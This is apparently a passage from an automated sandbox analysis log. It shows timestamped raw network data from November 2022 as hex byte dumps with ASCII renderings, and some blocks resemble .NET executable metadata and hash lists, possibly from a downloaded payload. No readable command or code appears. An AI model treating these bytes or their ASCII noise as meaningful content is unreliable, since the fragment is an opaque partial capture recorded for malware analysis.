6d cf e0 7e ea df 89 28 80 4b 4d 66 e3 d3 3e 1b 90 09 75 34 50 be 79 69 60 14 66 09 20 88 bf c6 e1 6c 26 6c 17 dd 45 f8 48 e8 90 9b 43 03 8b 97
                                                                                                        Data Ascii: pnVe,##7pnd6Cpn">kbmG>-y%.0CcHpn[5Q8bkHW<wVdl?rQJhK*<*%_[[bpnkERtm~(KMf>u4Pyi`f l&lEHC
                                                                                                        2022-11-03 22:35:57 UTC438INData Raw: fa f0 8c 21 ec 1a cf 93 63 15 88 bd 34 7d 94 b6 0a 2e a2 5c 7a fc cd 6c b4 e9 d6 f2 b5 92 ad 93 a4 83 7b da 4e ee 14 2d c7 3c c5 66 95 13 54 68 6b c8 fb bf 9f 22 5c 3d f7 e8 d9 66 d5 e3 48 25 1a fe a0 65 ff 7c 7c 35 8d bf b8 f0 2a 4b 96 55 bf 8d 55 cc 98 9b 6a 84 a6 89 7f 23 33 08 37 5e 1f fb a2 d5 87 ef 3b 82 6d e9 50 64 11 1b 6e d6 15 b2 20 b1 19 e3 9c dd ac 5f 82 ba d3 c9 8e 74 c1 96 7c 51 c2 44 75 a0 25 0b d9 97 80 0c 0c b4 5d bc c2 f6 c3 69 2e b3 6c 49 96 63 a9 8f bb 62 59 3d b6 b0 ae 5f 34 7d 3f c2 2f 3f 95 43 59 91 e3 8b 64 ca 50 21 da d5 60 d2 55 4b 78 b6 9d 7c b1 60 22 f1 85 49 96 89 06 54 11 b8 dc 29 d1 91 7e 59 6b 5d 33 ad ab 08 de e8 94 c5 12 ec ad 20 2a 39 5d c2 d3 46 64 01 d5 d3 77 38 f4 af 90 aa 99 a9 77 9e 80 fe d5 4d 33 1c 79 72 85 e4 16
                                                                                                        Data Ascii: !c4}.\zl{N-<fThk"\=fH%e||5*KUUj#37^;mPdn _t|QDu%]i.lIcbY=_4}?/?CYdP!`UKx|`"IT)~Yk]3 *9]Fdw8wM3yr
                                                                                                        2022-11-03 22:35:57 UTC445INData Raw: bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e 36 9c 0f 80 15 e6 38 ba bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5
                                                                                                        Data Ascii: pnpnpnpnpnpnpn68pnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnpnp
                                                                                                        2022-11-03 22:35:57 UTC453INData Raw: 09 f0 6c 21 3a 2e 3c 98 79 2b 07 b1 d9 45 d7 f9 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e b1 a2 f1 3f 75 b4 92 f2 dc 05 5b 01 a4 5b 48 64 5c e6 c8 64 02 f5 d4 ef 41 c2 6f 69 43 57 32 a1 cc 43 2c 2a f7 e4 74 99 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 1d db 3c 28 a0 74 58 e8 79 2b 07 b1 d9 45 d7 f9 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e b1 a2 f1 3f 75 b4 92 f2 fa 52 30 12 69 3e 3f 20 68 ee a6 53 24 42 1f ae b5 28 c3 2f e7 75 c5 bd fd f8 72 3c fb 71 11 80 20 8c da 6e d3 4d 27 90 88 ee b9 f9 de e4 e7 ec 20 8c da 6e d3 4d 27 90 e3 f5 ba 82 d5 41 4d 15 e3 f5 ba 82 d5 41 4d 15 a4 25 2a a3 b1 88 ef
                                                                                                        Data Ascii: l!:.<y+Epnpnpn?u[[Hd\dAoiCW2C,*t%*0%*0%*0%*0%*0%*0<(tXy+Epnpnpn?uR0i>? hS$B(/ur<q nM' nM'AMAM%*
                                                                                                        2022-11-03 22:35:57 UTC461INData Raw: bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e 06 2c cc a7 6b 2e 02 30 59 ec 3b 69 78 35 cf e0 a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 c4 b3 a9 60 9f 0b 9a 02 ee 74 1c 90 e6 62 01 1d ff e9 3f 01 bb 61 87 c3 ce 37 aa d7 16 83 76 97 bd 06 6b af fc d4 aa 0e ee 75 7d c1 bd fb 01 d1 df d9 9a d8 ac ff 0b 12 ff e0 a0 23 01 fa c7 9b 19 59 ad 27 96 18 4c 46 cb 44 e9 3e e6 d3 d0 62 a4 0b 16 3a 3f 88 1e e2 49 b7 26 83 6c c6 12 45 1f 3b c2 c7 aa 12 b8 ed a4 25 2a a3 b1 88 ef 30 a4 25 2a a3 b1 88 ef 30 9e 48 9a de b5 cb 4c b1 67 ec 2a ee dd c8 af 20 bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e bd b0 0e 70 80 da a5 6e 06 2c cc a7 6b 2e 02 30 59 ec 3b 69 78 35 cf e0 e9 3c df d1 00 38 3d 08 68 6d 13 ae 84 27 f9 3f 6b 33 83 5b a3 3c 1a 14 1e 03 79 1e 17 5e 4c
                                                                                                        Data Ascii: pnpn,k.0Y;ix5%*0%*0`tb?a7vku}#Y'LFD>b:?I&lE;%*0%*0HLg* pnpnpn,k.0Y;ix5<8=hm'?k3[<y^L
                                                                                                        2022-11-03 22:35:57 UTC469INData Raw: 9c 04 4c f5 2d da 5b 82 3c e2 cc ec e0 f2 c7 6f 1e 3f 42 5e 34 12 88 c4 3e 81 4e a9 63 51 99 17 7f 1d 2c 90 1f b5 cf 00 43 87 f0 64 d8 af 32 87 c4 3d 4b f5 77 92 c0 6b 8e ee a3 2d 33 00 0f ce a0 fb 0d 6d d7 18 00 98 e6 3d f4 86 1d b4 6e f5 45 6b 06 87 65 c3 37 a9 4e 92 63 f8 89 19 0e 34 a9 2f 58 3b 44 71 06 d0 3b 16 9e 54 b1 7a c4 3e a2 f9 62 59 70 46 5d 05 7d 9d 27 3c d0 f0 bf 58 1b ca e4 19 cb d5 61 cc 01 de 92 16 46 e6 39 96 87 34 df 16 3c 5b 3a 33 12 39 d3 2b b4 19 fe 10 eb 68 d0 54 43 12 05 ff 65 c3 8c f0 c9 1c 39 7a c5 4f f2 cd 2d e4 2a be 4e 12 05 18 44 c3 6f 2c 4b bd 96 ec 73 70 d3 b4 32 6e 12 68 d9 40 18 d6 52 41 1c 32 5b 5a fd 0b aa 5c 8c 2e f0 4e 1b 9b 93 5b dc 8d 6a 3c c0 75 22 46 72 34 c1 4e a2 9d 9b e7 b5 06 b8 aa 72 9f 01 0b 43 f7 25 b4 66
                                                                                                        Data Ascii: L-[<o?B^4>NcQ,Cd2=Kwk-3m=nEke7Nc4/X;Dq;Tz>bYpF]}'<XaF94<[:39+hTCe9zO-*NDo,Ksp2nh@RA2[Z\.N[j<u"Fr4NrC%f
                                                                                                        2022-11-03 22:35:57 UTC477INData Raw: 27 6e a9 23 0c 7d 99 d6 7f 1d c8 c9 a1 51 ec 9b 60 87 0e f8 e6 1f af 70 a8 99 c1 19 11 b4 81 3d cc e8 0a 9d 81 ef c0 b3 2f e3 17 fa ff 94 2a 8a 2c c5 0b 4c 9e d0 99 17 6b 0e 59 eb fe 05 a4 4d ee 16 ae 44 43 57 dd 41 a2 f2 4b 8c 10 22 67 0b 27 9a e6 26 d2 2c c1 ed f9 0f 54 47 6f 49 26 56 2b 11 5b af 63 ed 3d ad a6 20 69 cb ab 58 c7 cb 98 e1 69 11 be 7d 8e 91 cb a6 b4 8a 0e 04 01 9a 9d 9f cd 28 cd aa 91 ce 2b 97 dd d8 60 ee 08 e3 c3 ec 6d e7 70 a3 a1 c4 58 54 cd a2 94 9f 22 d0 e5 1b f6 9d aa ef 87 0a 09 b1 ef 37 83 ac 80 40 fe b2 6c a5 77 c6 d0 74 2e 79 2b ec ae 76 c4 38 d7 26 b9 c6 b0 e9 52 75 bc b4 cc 16 ea c4 59 7a fd dd a5 63 cb 85 ab fa 74 b8 bc 60 52 07 a3 81 9b 7a 50 5c 78 8f 47 2c f4 0b 9f 00 4a c9 81 b7 87 e6 60 8f 38 dc 4e dc dd 00 a1 0e 25 c5 01
                                                                                                        Data Ascii: 'n#}Q`p=/*,LkYMDCWAK"g'&,TGoI&V+[c= iXi}(+`mpXT"7@lwt.y+v8&RuYzct`RzP\xG,J`8N%
                                                                                                        2022-11-03 22:35:57 UTC484INData Raw: d2 b5 44 6b 1a a2 e6 46 07 62 74 ba c9 96 4a 53 5b 3b a7 3c d2 8b a1 5f 10 22 ae cc da a7 46 58 e0 be 1a 8e c4 be e6 7c 9a 47 e3 25 f6 f0 55 29 09 97 b1 67 43 f9 89 38 17 12 e9 b4 b5 12 9e 80 34 65 aa 80 57 49 6c 12 03 c3 34 b2 7e d9 09 b6 aa 82 64 bb a6 e6 ac a9 6f 7e a9 75 35 12 7e bb 21 c4 6f 25 8b 1e 2b ca d8 31 ba 33 18 bd 1d cd 39 c5 a6 c2 87 43 50 69 91 aa d7 c1 2e fa f4 26 3f 4e b9 b9 9b 84 b8 98 73 70 25 80 d5 26 71 7d 61 90 dc 94 4e 0a c1 15 d7 60 0c 14 68 c4 a9 85 ad c8 aa be e9 b6 e1 55 2c 6b 36 43 a3 7b 4e e2 ef 50 5f c2 7c c8 ba 64 54 e9 0e ae 5e ef 0f 36 02 a6 fd 3a 24 95 93 cf cb d5 69 a6 cc a0 73 55 b7 be b6 ef df 86 54 ab ae 80 bc 13 f7 ae e7 5e 88 4f 27 c9 36 65 0c 1b 31 29 e3 87 a1 c9 75 b2 3b 3a 6b 7a 91 0b ab 64 f3 dd 79 2e 12 ef 3f
                                                                                                        Data Ascii: DkFbtJS[;<_"FX|G%U)gC84eWIl4~do~u5~!o%+139CPi.&?Nsp%&q}aN`hU,k6C{NP_|dT^6:$isUT^O'6e1)u;:kzdy.?
                                                                                                        2022-11-03 22:35:57 UTC492INData Raw: 22 8b 59 f4 03 ca 69 e4 17 e1 45 e8 76 5f 04 5a 80 12 d7 33 16 00 64 d3 db b3 5c 75 64 4f 9f 2c de 4f d0 57 7f 46 2b a6 96 37 fe c5 17 47 b4 53 ab e3 c0 5d 14 ec 92 c4 5c 8b 58 de b4 c6 9b 1d 32 06 65 04 3f 76 a0 6b 0a 5d 8e a0 c7 69 f9 11 62 49 a2 16 11 06 c8 3b 11 10 4d ed 14 e8 aa 3b 13 ad 74 41 97 fe 5c 04 b1 a0 a6 36 df 66 ab 30 1c 8f 02 d8 10 91 1d b0 8f 38 4b fa 3b 27 7e 82 f0 33 0d 7e 5e 3d 25 e7 e5 bd a0 aa f6 38 37 80 99 c9 d8 40 ea 1f 49 1a b2 4b 54 01 a3 04 99 cc b9 77 3c 10 84 71 13 2a d6 07 50 62 54 90 5a 05 da ef a9 28 ce 97 07 01 5c b8 bd 93 17 6b 5b 19 4c 0c 4c 1d 07 f8 e2 5e ad 68 c0 86 5a 2c 45 4d 10 31 9f 73 5d c7 bc 93 7a 09 6b 7d 03 54 43 f7 0e 90 99 5d 83 25 f8 ef cc c6 05 00 6b 45 02 45 8d 3b 64 72 6d 85 ed 55 ef 71 8c 20 fb ad 9c
                                                                                                        Data Ascii: "YiEv_Z3d\udO,OWF+7GS]\X2e?vk]ibI;M;tA\6f08K;'~3~^=%87@IKTw<q*PbTZ(\k[LL^hZ,EM1s]zk}TC]%kEE;drmUq
                                                                                                        2022-11-03 22:35:57 UTC500INData Raw: a7 9f 8d 82 ff 4f 22 2a 33 ac 62 43 0a 4d a5 b0 5e e5 16 ba dc 8c a1 d4 12 63 f2 cf 56 14 3a 9d 05 96 a4 93 ad 00 c7 1b 30 90 cd 58 c3 f5 07 d0 cd 97 ae e0 f8 04 46 4c 7c d6 58 0d 44 08 fe 3b 5b 9c 1a 75 ed e2 46 10 37 b6 c3 24 01 cd 0b a5 60 d3 7b ee 8c 43 bf bb 64 14 5f 74 d2 06 62 e2 e7 41 87 84 44 28 64 17 b2 29 e1 cc 05 17 9c ea ed d7 61 19 65 0a f5 71 85 47 3a a3 04 40 33 16 ac 44 53 10 29 cb b1 3f 2f b7 8b fd dc 06 b7 23 ac aa b1 ca 3c 7b ab 52 c5 ca b4 c9 b3 37 0f 96 d3 fa c6 e5 80 5d 2e 95 f9 f8 5f 30 6e 62 9f db 8c 59 66 e9 3e b6 f4 09 9f 95 2a 4a 67 53 fd 3c 8f d8 e0 80 b2 b2 1c c7 70 16 1b a4 91 c5 7b a0 4c 6f c8 36 6b f0 d3 69 f2 fb 96 34 81 5f 41 f4 65 bb 98 b7 f3 e7 6c 51 76 f9 70 61 3c 38 f7 7b de 29 ac 21 5a a5 d1 81 d7 0b e4 16 b4 e9 eb
                                                                                                        Data Ascii: O"*3bCM^cV:0XFL|XD;[uF7$`{Cd_tbAD(d)aeqG:@3DS)?/#<{R7]._0nbYf>*JgS<p{Lo6ki4_AelQvpa<8{)!Z
                                                                                                        2022-11-03 22:35:57 UTC508INData Raw: 13 da 74 fd 93 4e ad 7b 9c 73 b6 12 60 d0 c0 5c 2b e7 ff 3d 5f b9 51 09 19 30 90 90 d3 42 f6 03 cc fe 20 f3 05 dd 00 9d 14 9c 9c 37 18 ce 4f f2 30 e5 e1 28 1d 2a c0 88 e5 a4 d8 88 29 72 13 8b 4f a9 70 d8 34 39 d2 b0 b1 09 a1 36 9e 8f f9 32 5c 50 72 68 76 05 a1 68 5f 5e 2e b6 19 76 ae f6 d9 9c 5e 68 f0 41 31 0c e7 d8 c6 80 f5 91 36 60 7b 1e 5a 85 5b fa d4 c1 dc d6 9a 7f dc 04 cc c8 9c 15 b0 f6 05 cd 68 92 7e de be 10 b5 68 7b dc 84 4c dd 52 3a a6 c0 63 00 2b 9b 67 f0 e6 dd 03 69 f6 29 fd 90 0a b4 05 c1 81 63 0e f2 aa 54 32 b7 49 39 6c 85 8c 8a fc a0 5c 13 7d eb fc 49 38 15 a6 6a 35 8d 55 39 1a 97 63 4b 47 e0 9e 8f f8 79 99 4c af ca 66 de 1f cf ba dc d9 76 39 73 6d 6b 9e 9e f5 e5 41 31 97 f6 8a 38 3d 58 be e3 62 b6 24 e6 b0 70 53 92 70 0c 50 47 00 61 b5 fc
                                                                                                        Data Ascii: tN{s`\+=_Q0B 7O0(*)rOp4962\Prhvh_^.v^hA16`{Z[h~h{LR:c+gi)cT2I9l\}I8j5U9cKGyLfv9smkA18=Xb$pSpPGa
                                                                                                        2022-11-03 22:35:57 UTC516INData Raw: c6 89 a4 13 42 4d cf 76 6d b3 d3 0d 47 2e 50 84 76 46 f3 d8 04 59 ef d4 cd 91 a1 6d ea 49 d6 f6 20 fa bb 7a c2 da 97 20 79 7d 82 51 af 3b 62 9e c1 9c 61 a8 50 dd b3 42 ae dc 3a 4d 35 04 f1 33 a7 ee 83 8f ba 17 01 e0 96 6c 65 46 95 3c 79 db 52 c5 38 3b a7 67 dc f8 b9 ae 4d 02 04 93 1e 16 20 25 36 ff 24 b7 7c f4 ca 3b 8c 0a 78 fa bd 69 a1 24 4f 20 7f 98 a5 af 32 15 6e df 11 c6 cf d1 21 c8 7b 67 1a 75 02 3c ff 2a 17 85 16 fe dd 34 f1 2b bc 18 d8 ff 3f 54 e4 a9 a7 86 1c ca be 1b c6 46 a9 2d 17 b8 1f 39 12 3c 87 82 10 f8 ae 84 13 19 a5 14 71 6d ba f9 07 fe 79 36 67 de 54 47 60 e2 a2 17 8a 88 41 0b 8e ba 8f 68 78 8a 7e 49 fa 9d 7b ed ee 0a b4 05 c1 81 63 0e f2 75 db 74 39 9b 6d 8b 26 57 38 aa e9 77 72 bf fd 06 cc 6c 1b 6a 58 e8 44 80 b0 ed 52 e2 32 bd a1 ea 24
                                                                                                        Data Ascii: BMvmG.PvFYmI z y}Q;baPB:M53leF<yR8;gM %6$|;xi$O 2n!{gu<*4+?TF-9<qmy6gTG`Ahx~I{cut9m&W8wrljXDR2$
                                                                                                        2022-11-03 22:35:57 UTC523INData Raw: 00 21 ea 2b a9 c4 bc 83 13 d8 f7 e6 bd 1e 7e b3 48 77 6c 9a cb 5e 71 77 ba 4e ec 48 a5 b8 76 20 ef c7 9b 8d 9b 7c b6 41 56 07 36 84 6d 00 ce 27 ee ba cf 03 91 49 57 10 65 db 43 37 5f 7c b6 41 56 07 36 84 6d de d5 61 3b 78 46 27 bb 20 84 fb fa a4 dc 97 55 c2 34 43 fd c4 a8 4c 4d 9f 5e 77 ee 4f 6a a1 ee f5 06 90 6f 94 7c bc 21 7c b6 41 56 07 36 84 6d 59 0d c9 3a 6c 68 83 18 19 9f 44 c0 aa 26 4f 8a c2 34 43 fd c4 a8 4c 4d f2 f7 84 51 04 33 ed 30 53 d2 71 a9 07 95 f5 08 c2 34 43 fd c4 a8 4c 4d 83 4a 46 bc d3 66 57 a7 32 de eb fe 77 05 9b 6e 20 94 4a ee a8 38 9b 27 4d 28 12 91 2c ee 83 55 fc c5 1f 0f e7 98 31 41 00 46 94 a8 91 a0 ca d2 06 00 35 40 ba 21 0c c5 ba aa 69 0b 9e 2c 96 5e c2 34 43 fd c4 a8 4c 4d 72 dc bb 03 88 13 d2 e7 c1 f1 2c b3 3f 90 de 03 ea d5
                                                                                                        Data Ascii: !+~Hwl^qwNHv |AV6m'IWeC7_|AV6ma;xF' U4CLM^wOjo|!|AV6mY:lhD&O4CLMQ30Sq4CLMJFfW2wn J8'M(,U1AF5@!i,^4CLMr,?
                                                                                                        2022-11-03 22:35:57 UTC531INData Raw: a8 4d f5 4f 93 25 81 4f 32 86 a4 de 88 d3 f3 7b f5 f8 a2 56 0c 29 cb b4 63 41 9d 91 95 d1 99 a8 d9 a9 94 79 0c 4c 2b 6a 42 48 44 a9 07 28 2c c0 dd 51 00 1b 72 4b 2d a0 0c d7 f6 68 b4 4f 51 7f 4e a6 2a 5a 16 04 d0 be d7 19 f0 23 a6 c7 17 9b 6c d5 32 42 f2 7e aa 30 4a 88 5d 09 a9 eb 63 8b ae 36 18 b0 09 dd ca f2 0d 46 79 18 f9 5d 21 57 64 97 bb 0e 8c 04 4d a9 8a 47 99 2b cb b8 e0 20 fb 60 f4 81 af 50 30 f8 72 66 31 c3 4b 67 3b 84 5f 71 5b c8 42 6c 5a 1b 43 0b f8 e0 4a 4f 24 a8 0e a4 73 9d 15 00 5c e9 b4 51 5f 9c a7 4f ca d2 08 66 99 f3 25 90 ad e5 e9 be ec 48 cb 36 1f ad 65 b7 55 84 59 fd 40 c4 da 92 d6 69 f7 62 1e dc 7b a1 b4 d4 a4 76 84 a0 82 4a 2f f9 28 df 67 e3 c7 1a c4 e4 08 fb 01 e8 52 b7 5c 88 e3 04 4f 18 eb 20 ba 29 dd e0 ae 6a 5c dc 0c 5a 7d 23 8f
                                                                                                        Data Ascii: MO%O2{V)cAyL+jBHD(,QrK-hOQN*Z#l2B~0J]c6Fy]!WdMG+ `P0rf1Kg;_q[BlZCJO$s\Q_Of%H6eUY@ib{vJ/(gR\O )j\Z}#
                                                                                                        2022-11-03 22:35:57 UTC539INData Raw: 2e ec 59 56 b6 d4 e7 9f 79 24 d7 1f 9d a1 7c cd a6 3e 6a 7c 27 fc cc 7c 71 28 ea 40 e4 79 19 1d f5 c9 01 b0 69 94 08 14 a7 c3 5f 3f a7 18 90 43 23 c5 66 b5 1e cc 2c 90 b2 42 97 62 ec c1 cd b9 a8 8d df 43 f5 96 45 60 c9 b2 3f 23 23 79 bb 7b 4f 76 0d 0f 99 f0 39 02 8f 93 38 3a dd 58 1d 90 46 3a 02 ad 9a 72 13 2b bb 98 db cc 5d 54 f2 96 d9 4a 50 6e ec 25 2c 95 f8 4e 02 1f c3 03 1e 13 99 c7 12 dd 0f 41 3c 85 18 c3 86 f2 61 02 c6 a3 de b8 8d 38 05 d4 1c c0 2f bd be 8e c1 24 1e 57 df 44 fb 7d 63 d6 16 ad 9e 1a 85 95 3e 84 de 41 4c b2 2b 37 e5 e4 be 20 96 65 0f f0 38 ae 6b 8b ac 21 86 43 6f 2c 21 a8 e7 3d 0e 4d 6f 77 e9 a0 2f 5b 06 50 82 53 c7 89 71 87 3f 13 15 17 40 88 e5 f1 84 a3 c9 e9 73 f7 4f 4a 3a 06 c6 93 e2 0b 10 8d 6e a9 54 ed 84 d9 39 40 a2 41 e6 64 6e
                                                                                                        Data Ascii: .YVy$|>j|'|q(@yi_?C#f,BbCE`?##y{Ov98:XF:r+]TJPn%,NA<a8/$WD}c>AL+7 e8k!Co,!=Mow/[PSq?@sOJ:nT9@Adn
                                                                                                        2022-11-03 22:35:57 UTC547INData Raw: fc c7 9f 8e 1a f3 5b 12 31 63 28 75 cd 8c 58 fd ac 50 de 9e 9e 84 66 ef 9c 32 08 38 f6 e6 1e 7e 23 1b 3c 2d 38 2e b9 5e 2f ab 4e 53 bc 33 d6 b5 f4 99 20 eb fd d6 32 98 b8 14 24 c3 29 dc 4b 4d b3 ba ab 86 0f 25 1d d2 92 ee a5 b9 96 2e 2c 6c c9 7a 0d d3 1c 2d 32 44 b5 e0 15 c5 5c 79 d3 2c 55 5e d7 81 74 64 b5 71 43 2b a9 e9 09 e6 c3 af 21 ec 9c 86 fa 2e fb e0 19 0d 86 06 2b 8c 3a 3c d3 ec 94 05 df af 68 2f 24 f1 93 dc da 98 f1 4c 41 84 42 fd 82 9c 48 22 e4 53 6c be e2 8e ca e9 f4 9a 8d ac 3d 25 12 fb 09 f6 39 5c c7 d5 53 ce 82 95 38 f2 24 8e 4c cd 79 13 7f af 76 70 f3 8f 1e b1 fe 01 f5 13 15 63 67 57 4f 7c b5 4b 7b b5 cc a6 b5 65 79 6e d9 e6 2b 9f 97 89 2c 9a d9 be e5 a0 18 5d 06 f5 cc 98 7e 06 02 5e 84 c3 c2 9d ab 92 ce 91 8e 49 8b a0 3c 7e 3c f2 fd 3e 6b
                                                                                                        Data Ascii: [1c(uXPf28~#<-8.^/NS3 2$)KM%.,lz-2D\y,U^tdqC+!.+:<h/$LABH"Sl=%9\S8$LyvpcgWO|K{eyn+,]~^I<~<>k
                                                                                                        2022-11-03 22:35:57 UTC555INData Raw: 3b c2 7e e8 f0 90 82 fe c8 41 30 24 a3 bd 05 77 c9 4a 15 48 6b 27 62 c4 b0 c2 97 cf 86 2d 76 9f db 0d 15 d3 bf 32 da 32 fe 13 4e 6e 31 84 58 e0 15 c1 aa 4c cf fc 73 6a 13 4a 20 46 8d d0 84 ec 4b 77 c3 ac 5b 6e 07 eb b9 5b a2 50 55 48 9a a9 40 74 75 ed 1a d3 44 6c 5f 32 5f c0 4e 8a 15 0c 1f a0 6e c7 ff ee c1 99 3b 36 70 07 78 e7 c2 6e 14 8f e6 20 9c 70 6b f2 99 f8 0d cd da e9 dd fb 08 5b 77 0a 6c 2c fc 7e f5 fb 69 98 47 09 e3 9c 22 ba 06 9f 96 c5 51 fa 9f 5b 8e a1 f4 d3 f3 05 9a a8 53 d5 3f a8 30 b3 a1 9c ad dd 0e 02 ab e2 91 f3 df 01 3a 15 c5 1e 8d 10 79 7f e0 e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c fc e5 7a b3 e0 5b 8e 55 d8 6f fb 77 11 d8 c8 0c 5b f4 8c 0e 12 ab 2c 55 e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c e9 dd fb 08 5b 77 0a 6c e9 dd
                                                                                                        Data Ascii: ;~A0$wJHk'b-v22Nn1XLsjJ FKw[n[PUH@tuDl_2_Nn;6pxn pk[wl,~iG"Q[S?0:y[wl[wlz[Uow[,U[wl[wl[wl
                                                                                                        2022-11-03 22:35:57 UTC563INData Raw: a3 76 d8 8b 11 64 c0 43 60 e4 b3 b7 85 64 f9 7c 33 3f ee b3 f4 1f e2 a2 86 af 8e cd 74 46 7e 6f 4d 43 35 71 70 92 bc 55 12 d6 01 f6 e9 25 99 67 7c db d8 a7 77 a4 e7 49 0a ec 86 d7 c4 a8 34 c3 3e b1 a3 6f ca 35 45 a3 16 2d f5 ff a3 2c 13 5f 74 fa 6f c6 32 79 c4 10 5a d9 ac e3 12 ca 71 15 05 a2 4f 20 88 6a e6 72 d1 8c ff 97 44 f2 81 38 a1 07 df 7f 9d 8d 46 08 6c 3a 48 b1 6c a6 6a 53 d7 95 0f f5 62 7b 33 20 59 88 49 1e b8 c0 e1 1f 88 4e 56 0a 43 fa 48 a7 e2 89 34 6f 3a 42 d1 90 17 88 be f9 2c 21 ee a1 89 59 54 8e 81 b4 97 4c a2 5d 8e 8d dc c8 9b d6 3a 26 7a 49 ff fd 05 ff b2 5f f1 61 38 ca 16 e6 f6 bb c9 0f 43 55 0f 95 d6 7c 02 ba 8f 80 c2 03 0c 35 95 f5 95 5d e8 58 be 2f 18 69 44 3c 14 2c 94 5f cc 50 70 cc 11 27 7f bf d9 2f 0b 87 2a 47 a9 9d bf 5a f2 0c 63
                                                                                                        Data Ascii: vdC`d|3?tF~oMC5qpU%g|wI4>o5E-,_to2yZqO jrD8Fl:HljSb{3 YINVCH4o:B,!YTL]:&zI_a8CU|5]X/iD<,_Pp'/*GZc
                                                                                                        2022-11-03 22:35:57 UTC570INData Raw: 06 fe 08 01 01 07 01 59 28 01 00 01 01 09 01 66 28 01 00 01 01 0b 01 72 28 01 00 01 01 0d 01 7e 28 01 00 46 01 0f 01 92 28 01 00 03 01 11 01 9e 28 01 00 03 01 13 01 9e 28 01 00 03 01 15 01 9e 28 01 00 03 01 17 01 9e 28 01 00 03 01 19 01 9e 28 01 00 03 01 1b 01 9e 28 01 00 06 01 1f 01 ad 28 02 00 04 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 1f 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 0a 00 28 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 3e 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 45 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 0a 00 5a 00 00 00 00 00 00 00 00 00 01 00 00 00 81 00 00 00 14 9b 08 00 01 00 00 00 a2 00 00 00 07 00 06 00 08 00 06 00 09 00
                                                                                                        Data Ascii: Y(f(r(~(F(((((((((>EZ
                                                                                                        2022-11-03 22:35:57 UTC578INData Raw: 31 31 37 39 31 37 35 66 63 35 64 61 35 61 63 00 63 38 63 61 62 33 35 63 33 62 33 31 61 31 30 33 30 36 63 61 64 37 63 30 36 36 39 65 62 33 39 37 66 00 63 39 66 33 31 37 63 64 66 34 62 34 64 30 35 32 30 66 30 64 66 61 33 31 33 61 33 36 31 62 63 33 31 00 63 39 31 31 63 32 33 31 31 33 61 31 37 34 36 37 35 66 61 65 31 36 36 39 65 39 39 64 30 37 39 62 35 00 63 37 65 34 63 66 64 34 63 39 65 31 34 32 63 66 33 32 65 39 65 62 65 35 63 32 30 64 35 32 38 65 37 00 63 31 65 65 31 33 66 39 65 64 63 65 61 36 33 39 30 63 37 33 62 62 63 65 66 35 37 32 31 66 36 66 33 00 63 39 62 30 36 64 62 31 37 30 38 38 34 62 30 36 31 33 34 32 63 34 31 36 35 34 65 32 33 34 30 66 36 00 63 62 33 62 63 35 30 38 36 31 63 64 35 65 66 37 39 31 32 32 39 32 32 63 62 30 34 31 61 30 38 33 62 00 63
                                                                                                        Data Ascii: 1179175fc5da5acc8cab35c3b31a10306cad7c0669eb397fc9f317cdf4b4d0520f0dfa313a361bc31c911c23113a174675fae1669e99d079b5c7e4cfd4c9e142cf32e9ebe5c20d528e7c1ee13f9edcea6390c73bbcef5721f6f3c9b06db170884b061342c41654e2340f6cb3bc50861cd5ef79122922cb041a083bc
                                                                                                        2022-11-03 22:35:57 UTC586INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii:
